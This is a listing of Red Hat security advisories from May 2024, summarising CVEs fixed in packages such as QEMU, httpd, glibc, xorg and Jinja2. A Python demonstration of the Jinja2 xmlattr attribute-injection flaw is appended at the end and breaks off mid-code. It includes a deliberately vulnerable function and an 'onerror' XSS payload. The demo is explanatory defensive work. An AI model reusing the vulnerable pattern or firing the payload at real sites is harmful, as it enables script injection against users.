22.05.2024 03:00:00 | redhat | [RHSA-2024:2961] Image builder components bug fix, enhancement and security update (moderate) | Image Builder is a service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood. Security Fix(es): * osbuild-composer: race condition may disable GPG verification for package repositories (CVE-2024-2307). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2961
22.05.2024 03:00:00 | redhat | [RHSA-2024:2962] virt:rhel and virt-devel:rhel security and enhancement update (moderate) | Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Security Fix(es): * QEMU: VNC: infinite loop in inflate_buffer() leads to denial of service (CVE-2023-3255) * QEMU: improper IDE controller reset can lead to MBR overwrite (CVE-2023-5088) * QEMU: VNC: NULL pointer dereference in qemu_clipboard_request() (CVE-2023-6683) * QEMU: virtio-net: stack buffer overflow in virtio_net_flush_tx() (CVE-2023-6693). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2962
22.05.2024 03:00:00 | redhat | [RHSA-2024:2968] fence-agents security and bug fix update (moderate) | The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es): * urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803) * pycryptodome: side-channel leakage for OAEP decryption in PyCryptodome and pycryptodomex (CVE-2023-52323) * jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2968
22.05.2024 03:00:00 | redhat | [RHSA-2024:3061] pki-core:10.6 and pki-deps:10.6 security update (moderate) | The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System. Security Fix(es): * jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3061
22.05.2024 03:00:00 | redhat | [RHSA-2024:3066] exempi security update (moderate) | Exempi provides a library for easy parsing of XMP metadata. Security Fix(es): * exempi: denial of service via opening of crafted audio file with ID3V2 frame (CVE-2020-18651) * exempi: denial of service via opening of crafted webp file (CVE-2020-18652). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3066
22.05.2024 03:00:00 | redhat | [RHSA-2024:3094] perl-CPAN security update (moderate) | The CPAN module is a tool to query, download and build perl modules from CPAN sites. Security Fix(es): * perl: CPAN.pm does not verify TLS certificates when downloading distributions over HTTPS (CVE-2023-31484). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3094
22.05.2024 03:00:00 | redhat | [RHSA-2024:3121] httpd:2.4 security update (moderate) | The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Security Fix(es): * httpd: mod_macro: out-of-bounds read vulnerability (CVE-2023-31122) * mod_http2: reset requests exhaust memory (incomplete fix of CVE-2023-44487) (CVE-2023-45802). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3121
22.05.2024 03:00:00 | redhat | [RHSA-2024:2973] libX11 security update (moderate) | The libX11 packages contain the core X11 protocol client library. Security Fix(es): * libX11: out-of-bounds memory access in _XkbReadKeySyms() (CVE-2023-43785) * libX11: stack exhaustion from infinite recursion in PutSubImage() (CVE-2023-43786) * libX11: integer overflow in XCreateImage() leading to a heap overflow (CVE-2023-43787). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2973
22.05.2024 03:00:00 | redhat | [RHSA-2024:2981] frr security update (moderate) | FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es): * frr: missing length check in bgp_attr_psid_sub() can lead to DoS (CVE-2023-31490) * frr: processes invalid NLRIs if attribute length is zero (CVE-2023-41358) * frr: NULL pointer dereference in bgp_nlri_parse_flowspec() in bgpd/bgp_flowspec.c (CVE-2023-41909) * frr: mishandled malformed data leading to a crash (CVE-2023-46752) * frr: crafted BGP UPDATE message leading to a crash (CVE-2023-46753). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2981
22.05.2024 03:00:00 | redhat | [RHSA-2024:2982] webkit2gtk3 security update (important) | WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Security Fix(es): * webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-40414) * webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-42852) * webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-23213) * webkitgtk: Processing a file may lead to a denial of service or potentially disclose memory contents (CVE-2014-1745) * webkitgtk: User password may be read aloud by a text-to-speech accessibility feature (CVE-2023-32359) * webkitgtk: use-after-free in the MediaRecorder API of the WebKit GStreamer-based ports (CVE-2023-39928) * webkitgtk: Processing web content may lead to a denial of service (CVE-2023-41983) * webkitgtk: processing a malicious image may lead to a denial of service (CVE-2023-42883) * webkitgtk: processing malicious web content may lead to arbitrary code execution (CVE-2023-42890) * webkitgtk: A maliciously crafted webpage may be able to fingerprint the user (CVE-2024-23206). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2982
22.05.2024 03:00:00 | redhat | [RHSA-2024:2985] python39:3.9 and python39-devel:3.9 security update (moderate) | Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * pypa-setuptools: Regular Expression Denial of Service (ReDoS) in package_index.py (CVE-2022-40897) * python-cryptography: memory corruption via immutable objects (CVE-2023-23931) * python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043) * python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2985
22.05.2024 03:00:00 | redhat | [RHSA-2024:2987] python27:2.7 security update (moderate) | Python is an interpreted, interactive, object-oriented programming language that supports modules, classes, exceptions, high-level dynamic data types, and dynamic typing. The python27 packages provide a stable release of Python 2.7 with a number of additional utilities and database connectors for MySQL and PostgreSQL. Security Fix(es): * pypa-setuptools: Regular Expression Denial of Service (ReDoS) in package_index.py (CVE-2022-40897) * python: use after free in heappushpop() of heapq module (CVE-2022-48560) * python: XML External Entity in XML processing plistlib module (CVE-2022-48565) * python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804) * jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2987
22.05.2024 03:00:00 | redhat | [RHSA-2024:3127] zziplib security update (moderate) | The zziplib is a lightweight library to easily extract data from zip files. Security Fix(es): * zziplib: invalid memory access at zzip_disk_entry_to_file_header in mmapped.c (CVE-2020-18770). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3127
22.05.2024 03:00:00 | redhat | [RHSA-2024:3128] perl:5.32 security update (moderate) | Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fix(es): * perl: Write past buffer end via illegal user-defined Unicode property (CVE-2023-47038). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3128
22.05.2024 03:00:00 | redhat | [RHSA-2024:2988] container-tools:rhel8 security update (moderate) | The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc. Security Fix(es): * urllib3: urllib3 does not remove the authorization HTTP header when following a cross-origin redirect (CVE-2018-25091) * golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents (CVE-2021-33198) * golang: crypto/tls: certificate of wrong type is causing TLS client to panic (CVE-2021-34558) * golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879) * golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880) * golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715) * golang: crypto/tls: slow verification of certificate chains containing large RSA keys (CVE-2023-29409) * golang: html/template: improper handling of HTML-like comments within script contexts (CVE-2023-39318) * golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319) * golang: crypto/tls: panic when processing post-handshake message on QUIC connections (CVE-2023-39321) * golang: crypto/tls: lack of a limit on buffered post-handshake (CVE-2023-39322) * golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326) * golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges (CVE-2023-45287) * urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803) * ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795) * moby/buildkit: Possible race condition with accessing subpaths from cache mounts (CVE-2024-23650). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2988
22.05.2024 03:00:00 | redhat | [RHSA-2024:2995] xorg-x11-server security update (moderate) | X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon. Security Fix(es): * xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367) * xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377) * xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478) * xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229) * xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408) * xorg-x11-server: SELinux context corruption (CVE-2024-0409) * xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885) * xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886) * xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2995
22.05.2024 03:00:00 | redhat | [RHSA-2024:2996] xorg-x11-server-Xwayland security update (moderate) | Xwayland is an X server for running X clients under Wayland. Security Fix(es): * xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367) * xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377) * xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478) * xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816) * xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229) * xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408) * xorg-x11-server: SELinux context corruption (CVE-2024-0409) * xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885) * xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2996
22.05.2024 03:00:00redhat[RHSA-2024:3138] kernel security, bug fix, and enhancement update (moderate)The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3138
22.05.2024 03:00:00redhat[RHSA-2024:3163] pam security update (moderate)Pluggable Authentication Modules (PAM) provide a system to set up authentication policies without the need to recompile programs to handle authentication.Security Fix(es):* pam: allowing unprivileged user to block another user namespace (CVE-2024-22365)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3163
22.05.2024 03:00:00redhat[RHSA-2024:3211] traceroute security update (moderate)The traceroute utility displays the route used by IP packets on their way to a specified network (or Internet) host.Security Fix(es):* traceroute: improper command line parsing (CVE-2023-46316)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3211
22.05.2024 03:00:00redhat[RHSA-2024:3005] python-pillow security update (moderate)The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* python-pillow: uncontrolled resource consumption when textlength in an ImageDraw instance operates on a long text argument (CVE-2023-44271)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3005
22.05.2024 03:00:00redhat[RHSA-2024:3008] pmix security update (important)The Process Management Interface (PMI) provides process management functions for MPI implementations. PMI Exascale (PMIx) provides an extended version of the PMI standard specifically designed to support clusters up to and including exascale sizes.Security Fix(es):* pmix: race condition allows attackers to obtain ownership of arbitrary files (CVE-2023-41915)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3008
22.05.2024 03:00:00redhat[RHSA-2024:3017] edk2 security update (important)EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message (CVE-2023-45235)* EDK2: heap buffer overflow in Tcg2MeasureGptTable() (CVE-2022-36763)* EDK2: heap buffer overflow in Tcg2MeasurePeImage() (CVE-2022-36764)* EDK2: integer overflow in CreateHob() could lead to HOB OOB R/W (CVE-2022-36765)* edk2: Integer underflow when processing IA_NA/IA_TA options in a DHCPv6 Advertise message (CVE-2023-45229)* edk2: Out of Bounds read when handling a ND Redirect message with truncated options (CVE-2023-45231)* edk2: Infinite loop when parsing unknown options in the Destination Options header (CVE-2023-45232)* edk2: Infinite loop when parsing a PadN option in the Destination Options header (CVE-2023-45233)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3017
22.05.2024 03:00:00redhat[RHSA-2024:3022] motif security update (moderate)The motif packages include the Motif shared libraries needed to run applications which are dynamically linked against Motif, as well as MWM, the Motif Window Manager.Security Fix(es):* libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788)* libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3022
22.05.2024 03:00:00redhat[RHSA-2024:3047] 389-ds:1.4 security update (moderate)389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. Security Fix(es):* 389-ds-base: a heap overflow leading to denial-of-service while writing a value larger than 256 chars (in log_entry_attr) (CVE-2024-1062)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3047
22.05.2024 03:00:00redhat[RHSA-2024:3214] gmp security update (moderate)The gmp packages contain GNU MP, a library for arbitrary precision arithmetics, signed integers operations, rational numbers, and floating point numbers. Security Fix(es):* gmp: Integer overflow and resultant buffer overflow via crafted input (CVE-2021-43618)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3214
22.05.2024 03:00:00redhat[RHSA-2024:3253] virt:rhel and virt-devel:rhel security update (moderate)Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* libvirt: negative g_new0 length can lead to unbounded memory allocation (CVE-2024-2494)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3253
22.05.2024 03:00:00redhat[RHSA-2024:3264] pcp security update (important)Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: exposure of the redis server backend allows remote command execution via pmproxy (CVE-2024-3019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3264
22.05.2024 03:00:00redhat[RHSA-2024:3265] grafana security update (important)Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)* grafana: vulnerable to authorization bypass (CVE-2024-1313)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3265
22.05.2024 03:00:00redhat[RHSA-2024:3058] mutt security update (moderate)Mutt is a low resource, highly configurable, text-based MIME e-mail client. Mutt supports most e-mail storing formats, such as mbox and Maildir, as well as most protocols, including POP3 and IMAP.Security Fix(es):* mutt: null pointer dereference (CVE-2023-4874)* mutt: null pointer dereference (CVE-2023-4875)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3058
22.05.2024 03:00:00redhat[RHSA-2024:3060] gstreamer1-plugins-bad-free security update (moderate)GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-bad-free package contains a collection of plug-ins for GStreamer.Security Fix(es):* gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with uncompressed video (CVE-2023-40474)* gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with AES3 audio (CVE-2023-40475)* gstreamer-plugins-bad: Integer overflow in H.265 video parser leading to stack overwrite (CVE-2023-40476)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3060
22.05.2024 03:00:00redhat[RHSA-2024:3062] python3.11 security update (moderate)Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3062
22.05.2024 03:00:00redhat[RHSA-2024:3067] tigervnc security update (moderate)Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3067
22.05.2024 03:00:00redhat[RHSA-2024:3088] gstreamer1-plugins-base security update (moderate)GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-base packages contain a collection of well-maintained base plug-ins.Security Fix(es):* gstreamer-plugins-base: heap overwrite in subtitle parsing (CVE-2023-37328)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3088
22.05.2024 03:00:00redhat[RHSA-2024:3089] gstreamer1-plugins-good security update (moderate)GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-good packages contain a collection of well-supported plug-ins of good quality and under the LGPL license.Security Fix(es):* gstreamer-plugins-good: integer overflow leading to heap overwrite in FLAC image tag handling (CVE-2023-37327)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3089
22.05.2024 03:00:00redhat[RHSA-2024:3267] idm:DL1 and idm:client security update (moderate)Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es):* JWCrypto: denial of service via specifically crafted JWE (CVE-2023-6681)* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3267
22.05.2024 03:00:00redhat[RHSA-2024:3269] glibc security update (important)The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.Security Fix(es):* glibc: Out of bounds write in iconv may lead to remote code execution (CVE-2024-2961)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3269
22.05.2024 03:00:00redhat[RHSA-2024:3275] python-dns security update (moderate)The python-dns package contains the dnslib module that implements a DNS client and additional modules that define certain symbolic constants used by DNS, such as dnstype, dnsclass and dnsopcode.Security Fix(es):* dnspython: denial of service in stub resolver (CVE-2023-29483)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3275
22.05.2024 03:00:00redhat[RHSA-2024:3095] vorbis-tools security update (moderate)The vorbis-tools packages provide an encoder, a decoder, a playback tool, and a comment editor for Ogg Vorbis. Ogg Vorbis is a fully open, non-proprietary, patent- and royalty-free, general-purpose compressed audio format.Security Fix(es):* vorbis-tools: Buffer Overflow vulnerability (CVE-2023-43361)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3095
22.05.2024 03:00:00redhat[RHSA-2024:3102] python-jinja2 security update (moderate)The python-jinja2 package contains Jinja2, a template engine written in pure Python. Jinja2 provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment. Security Fix(es):* jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3102
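The python-jinja2 entry above (CVE-2024-22195) is about attribute *names*, not values: xmlattr escaped the value side but passed caller-supplied keys through untouched, so a key containing whitespace or "=" could smuggle extra attributes such as an event handler into the tag. The following added example, which is not code from the page or from the Jinja2 project and does not import Jinja2, re-implements the filter's rendering in plain Python to show the pre-fix behaviour next to a hardened version. The rejected character class (whitespace, "/", ">", "=") is my assumption about what a safe key check needs, not a quotation of the upstream patch; `render_img` and its user-chosen `data-*` key are a constructed scenario.

```python
import html
import re

# Characters that let a key terminate the attribute name or start a new
# attribute. This is the author's assumption about a sufficient check, not
# the literal regex from the upstream Jinja2 fix.
_BAD_ATTR_KEY = re.compile(r"[\s/>=]", flags=re.ASCII)


def xmlattr_vulnerable(attrs):
    """Mimics the pre-fix behaviour: values are escaped, keys are trusted as-is."""
    parts = []
    for key, value in attrs.items():
        if value is None:
            continue
        parts.append(f'{key}="{html.escape(str(value), quote=True)}"')
    return " " + " ".join(parts) if parts else ""


def xmlattr_hardened(attrs):
    """Same rendering, but refuses keys that could break out of the attribute name."""
    parts = []
    for key, value in attrs.items():
        if value is None:
            continue
        if _BAD_ATTR_KEY.search(key):
            raise ValueError(f"invalid character in attribute name: {key!r}")
        parts.append(f'{key}="{html.escape(str(value), quote=True)}"')
    return " " + " ".join(parts) if parts else ""


def render_img(attr_builder, user_key):
    """Constructed scenario: the application lets a user name a data-* attribute.

    The attacker controls only the key; the value and src are fixed by the app.
    """
    attrs = {user_key: "1", "src": "/static/logo.png"}
    return "<img" + attr_builder(attrs) + ">"


if __name__ == "__main__":
    payload = "x onerror=alert(1) y"
    print(render_img(xmlattr_vulnerable, payload))
    try:
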